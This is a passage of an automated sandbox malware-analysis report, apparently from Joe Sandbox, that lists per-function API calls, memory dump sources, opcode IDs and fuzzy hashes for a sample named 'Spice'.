                                                                                                                                                                                                                                      • LoadLibraryExW.KERNELBASE ref: 00E90EE7
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ChangeCloseFindLibraryLoadNotification
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1525634188-0
                                                                                                                                                                                                                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                      • Instruction ID: 9a62e1a3b4b178efd0fbb4a51784b9d4f19c60742d4f32bdbdcb53977b73680e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EA31C471A00109DFDF19DF58C4809A9F7A6FF59304BA49AA5E40AEB251E731EDC1CB80
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • IsThemeActive.UXTHEME ref: 00E85FEF
                                                                                                                                                                                                                                        • Part of subcall function 00E9359C: __lock.LIBCMT ref: 00E935A2
                                                                                                                                                                                                                                        • Part of subcall function 00E9359C: DecodePointer.KERNEL32(00000001,?,00E86004,00EC8892), ref: 00E935AE
                                                                                                                                                                                                                                        • Part of subcall function 00E9359C: EncodePointer.KERNEL32(?,?,00E86004,00EC8892), ref: 00E935B9
                                                                                                                                                                                                                                        • Part of subcall function 00E85F00: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00E85F18
                                                                                                                                                                                                                                        • Part of subcall function 00E85F00: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00E85F2D
                                                                                                                                                                                                                                        • Part of subcall function 00E85240: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E8526C
                                                                                                                                                                                                                                        • Part of subcall function 00E85240: IsDebuggerPresent.KERNEL32 ref: 00E8527E
                                                                                                                                                                                                                                        • Part of subcall function 00E85240: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00E852E6
                                                                                                                                                                                                                                        • Part of subcall function 00E85240: SetCurrentDirectoryW.KERNEL32(?), ref: 00E85366
                                                                                                                                                                                                                                      • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00E8602F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1438897964-0
                                                                                                                                                                                                                                      • Opcode ID: 62c6bf591ebf07230410f90ae756849562f36ae3c4e7ed88e70baf7c5709f6a9
                                                                                                                                                                                                                                      • Instruction ID: bacf57defc183068df8329fbd609163151870e88488b0c4d05ccd46da0f3140b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 62c6bf591ebf07230410f90ae756849562f36ae3c4e7ed88e70baf7c5709f6a9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6911AEB18083099BC720EF68ED0594ABBE9EF88320F00851EF488A32B2DB709545DF91
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E9593C: __FF_MSGBANNER.LIBCMT ref: 00E95953
                                                                                                                                                                                                                                        • Part of subcall function 00E9593C: __NMSG_WRITE.LIBCMT ref: 00E9595A
                                                                                                                                                                                                                                        • Part of subcall function 00E9593C: RtlAllocateHeap.NTDLL(013A0000,00000000,00000001,?,00000004,?,?,00E91003,?), ref: 00E9597F
                                                                                                                                                                                                                                      • std::exception::exception.LIBCMT ref: 00E9101C
                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 00E91031
                                                                                                                                                                                                                                        • Part of subcall function 00E987CB: RaiseException.KERNEL32(?,?,?,00F2CAF8,?,?,?,?,?,00E91036,?,00F2CAF8,?,00000001), ref: 00E98820
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3902256705-0
                                                                                                                                                                                                                                      • Opcode ID: 226aa43d5965623d4f1cf37bc0c867f209508f6e80f6c076c6c1954f13e93141
                                                                                                                                                                                                                                      • Instruction ID: 68281f7cb19232c564915d865f0293d7fe6d925b1d5b6e30d0a258ad48bc2834
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 226aa43d5965623d4f1cf37bc0c867f209508f6e80f6c076c6c1954f13e93141
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 56F0C875A0421EA6CF20BA98ED15ADE7BEC9F01314F10145AFD14F62D2DFB18B80E6E1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: __lock_file_memset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 26237723-0
                                                                                                                                                                                                                                      • Opcode ID: 5a00e72df405902dcc7918b293242bd04dcccdf15f408299a9fae6bd4b821131
                                                                                                                                                                                                                                      • Instruction ID: dd7900f18a8487615a76203be5bf6f5c47f1375fdb1c94cfd4c95355e96aa652
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5a00e72df405902dcc7918b293242bd04dcccdf15f408299a9fae6bd4b821131
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 45016772C01749EBCF22AF65DD0599F7BA1AF81360F185126F8247B1B1D7318A21DF91
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E98D58: __getptd_noexit.LIBCMT ref: 00E98D58
                                                                                                                                                                                                                                      • __lock_file.LIBCMT ref: 00E9560B
                                                                                                                                                                                                                                        • Part of subcall function 00E96E3E: __lock.LIBCMT ref: 00E96E61
                                                                                                                                                                                                                                      • __fclose_nolock.LIBCMT ref: 00E95616
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2800547568-0
                                                                                                                                                                                                                                      • Opcode ID: b6409fd547b415eba18ea1827598c3a184d9d1e654e3ec1626d25cd6033ff0f2
                                                                                                                                                                                                                                      • Instruction ID: 1ca63a1510385800e03e61e7e411132aedf02885584c1cf1e3ab4d41706e9c48
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b6409fd547b415eba18ea1827598c3a184d9d1e654e3ec1626d25cd6033ff0f2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 97F0B472901B059BDF127B759902B6E77E16F41334F16A20AB824BB1D2CB7C8A419F51
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __lock_file.LIBCMT ref: 00E95EB4
                                                                                                                                                                                                                                      • __ftell_nolock.LIBCMT ref: 00E95EBF
                                                                                                                                                                                                                                        • Part of subcall function 00E98D58: __getptd_noexit.LIBCMT ref: 00E98D58
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2999321469-0
                                                                                                                                                                                                                                      • Opcode ID: 9cba867a6731c039d7bccbc3b9b36c1e73ebf3e17f67c03b8439822c86a37b4c
                                                                                                                                                                                                                                      • Instruction ID: 25a884b9e23af74ba584591a1462082b81c7f81dd7692c7a8b2df0e70a5d2c9b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9cba867a6731c039d7bccbc3b9b36c1e73ebf3e17f67c03b8439822c86a37b4c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 17F0A7329116199ADF01BB74890275E72D06F12331F256307B424BB1E2CF788B419B55
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00E85AEF
                                                                                                                                                                                                                                      • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00E85B1F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: IconNotifyShell__memset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 928536360-0
                                                                                                                                                                                                                                      • Opcode ID: 8718ca242f7f837690d814c128a8be35f713a52bf58788c470fb6eb5a8d728fe
                                                                                                                                                                                                                                      • Instruction ID: a1aa6aa437039f528a1bfa59535172f7f74fe8e999e0ffc941b0e1b0df988c21
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8718ca242f7f837690d814c128a8be35f713a52bf58788c470fb6eb5a8d728fe
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E9F0A7B180830C9FD7A2DB64DC45796B7BC970030CF0001E9AA4C96292DB714B88DF55
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: LoadString$__swprintf
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 207118244-0
                                                                                                                                                                                                                                      • Opcode ID: 8d7758e916cc7fd8d46818d075ee4024b1007532627e0fd0101387739a97c728
                                                                                                                                                                                                                                      • Instruction ID: cc49242e45104b190f7931bda1e943593eb916e6bfa08f6569454ce88b75e63c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8d7758e916cc7fd8d46818d075ee4024b1007532627e0fd0101387739a97c728
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6DB17034A0014ADFCB14EFA9C851DEEB7B5FF48714F20915AF919B7291EB70A942CB90
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 6c00e00610a2f6b5b9c75c50a0c0d75d754e7477f8d5fd79ed90822e01c4b6f7
                                                                                                                                                                                                                                      • Instruction ID: b5ef4bfeb7c99eda196fe10c86ef7d39d2c6ff894c052e553f5206aeff005b5e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6c00e00610a2f6b5b9c75c50a0c0d75d754e7477f8d5fd79ed90822e01c4b6f7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A061FB70600206DFDB14DF60D881ABEB7E5EF84304F19907DEA1AAB281E770ED90CB52
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _memmove
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4104443479-0
                                                                                                                                                                                                                                      • Opcode ID: 719ee5b0fa6b9ba4850e2a8071915d723d28199ea914ec437d6a439a6195b7a7
                                                                                                                                                                                                                                      • Instruction ID: 4e72d9f2cd18897922f005d0820d8e09af13875fd55ce9300cda9cbb133f6d40
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 719ee5b0fa6b9ba4850e2a8071915d723d28199ea914ec437d6a439a6195b7a7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3831C175204A02DFC725EF28D480A61F7E0FF09B10714D569E89EAB7A1D730ED81CB80
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ClearVariant
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1473721057-0
                                                                                                                                                                                                                                      • Opcode ID: 137691e64577d1487759f68713d3efdc686b0c3c7b6b8a179bb4bdc07074823e
                                                                                                                                                                                                                                      • Instruction ID: f068156a2f8dc101259c979de84c3381bf45966a319880b82efc8be1f69d914c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 137691e64577d1487759f68713d3efdc686b0c3c7b6b8a179bb4bdc07074823e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9A411874508741CFDB24DF14C484B1ABBE1BF45308F1999ACE899AB362C772EC85CB52
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E84B29: FreeLibrary.KERNEL32(00000000,?), ref: 00E84B63
                                                                                                                                                                                                                                        • Part of subcall function 00E9547B: __wfsopen.LIBCMT ref: 00E95486
                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00E827AF,?,00000001), ref: 00E849F4
                                                                                                                                                                                                                                        • Part of subcall function 00E84ADE: FreeLibrary.KERNEL32(00000000), ref: 00E84B18
                                                                                                                                                                                                                                        • Part of subcall function 00E848B0: _memmove.LIBCMT ref: 00E848FA
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Library$Free$Load__wfsopen_memmove
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1396898556-0
                                                                                                                                                                                                                                      • Opcode ID: e179facd24d913de0eecb9269142cba628854e6dd746da6253d8798a2f246fc3
                                                                                                                                                                                                                                      • Instruction ID: 85074be8fc1b19636407c621a87af64b815cbfcc2acd9dfcff749ef7ab1a875f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e179facd24d913de0eecb9269142cba628854e6dd746da6253d8798a2f246fc3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7011017265021AABCB18FB60CC02FAE77E9DF40701F10946DF54DBA1C1FE758A01AB94
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _memmove
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4104443479-0
                                                                                                                                                                                                                                      • Opcode ID: d3511936f2c3a9f0ed1f08c39fcca023c8dcb164a1ab07be1a9a79502957a79d
                                                                                                                                                                                                                                      • Instruction ID: 92684eb4a7c4d4d363ead318add0c1a6967359f3058bad4dfcf37253d68a0f52
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d3511936f2c3a9f0ed1f08c39fcca023c8dcb164a1ab07be1a9a79502957a79d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CE114C76204601DFCB24DF28D581916F7E9FF49354B20986EE49EDB261E732E841CB50
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
